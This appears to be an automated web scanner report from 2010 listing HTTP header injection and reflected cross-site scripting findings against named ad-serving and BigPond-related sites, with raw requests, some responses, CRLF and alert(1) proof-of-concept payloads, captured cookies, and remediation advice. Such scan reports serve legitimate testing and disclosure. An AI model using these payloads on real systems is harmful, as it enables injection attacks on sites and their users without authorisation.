HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 2eb19%0d%0a0017009d30b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2eb19%0d%0a0017009d30b/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=676490127433?\ HTTP/1.1 Host: ad.au.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of REST URL parameter 1 is copied into the Location response header. The payload 56c09%0d%0a5d40b08f4f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /56c09%0d%0a5d40b08f4f5/N4517.128549.SENSISMEDIASMART3/B4907445;abr=!ie;click=http://media.sensis.com.au/ADCLICK/CID=0003307e1f45920200000000/acc_random=951172862928/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW2/pageid=365717345415/relocate=;sz=300x250;ord=951172862928? HTTP/1.1 Host: ad.au.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of REST URL parameter 1 is copied into the Location response header. The payload 6a7fd%0d%0aac0f46de021 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6a7fd%0d%0aac0f46de021/N799.Sensis12/B4964893.2;sz=300x250;click=http://media.sensis.com.au/ADCLICK/CID=000341f81f45920200000000/acc_random=676490127433/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=BLW3/pageid=365717345415/relocate=;ord=676490127433?\ HTTP/1.1 Host: ad.au.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 10a5a%0d%0af9168891924 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=010a5a%0d%0af9168891924; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;
The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 504f0%0d%0a52c6ed00ba4 was submitted in the Pos parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2006011&Page=&PluID=0&Pos=504f0%0d%0a52c6ed00ba4 HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b58b%0d%0a1915b172d08 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b%0d%0a1915b172d08; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 7216b%0d%0a306de5af752 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b%0d%0a306de5af752; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fcafc%0d%0abef809e8cc2 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2006011&PluID=0&w=300&h=250&ord=773648220124&ifrm=1&ucm=true&ncu=$$http://media.sensis.com.au/ADCLICK/CID=000345301f45920200000000/acc_random=773648220124/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=ABV1/pageid=365717345415/relocate=$$&z=0\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc%0d%0abef809e8cc2; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff716"%3balert(1)//ce6330e97f5 was submitted in the aid parameter. This input was echoed as ff716";alert(1)//ce6330e97f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=55653&aid=1000ff716"%3balert(1)//ce6330e97f5&pid=1000&ref=Dating HTTP/1.1 Host: bigpond.eharmony.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228d2"%3balert(1)//66a421fe9a4 was submitted in the cid parameter. This input was echoed as 228d2";alert(1)//66a421fe9a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=55653228d2"%3balert(1)//66a421fe9a4&aid=1000&pid=1000&ref=Dating HTTP/1.1 Host: bigpond.eharmony.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e6"%3balert(1)//d81f9eceae8 was submitted in the pid parameter. This input was echoed as 5b6e6";alert(1)//d81f9eceae8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=55653&aid=1000&pid=10005b6e6"%3balert(1)//d81f9eceae8&ref=Dating HTTP/1.1 Host: bigpond.eharmony.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 was submitted in the cid parameter. This input was echoed as cc97d"style="x:expression(alert(1))"3d602eff078 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?cid=bph-music-headcc97d"style%3d"x%3aexpression(alert(1))"3d602eff078 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 155790
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>BigPond Music - Music Downlo ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/?cid=bph-music-headcc97d"style="x:expression(alert(1))"3d602eff078" /> ...[SNIP]...
2.5. http://bigpondmusic.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c8ab"style="x:expression(alert(1))"27f2f63ab70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1 HTTP/1.1 Host: bigpondmusic.com Proxy-Connection: keep-alive Referer: http://www.telstraenterprise.com/Pages/Home.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Tue, 23 Nov 2010 02:44:20 GMT Content-Length: 155765
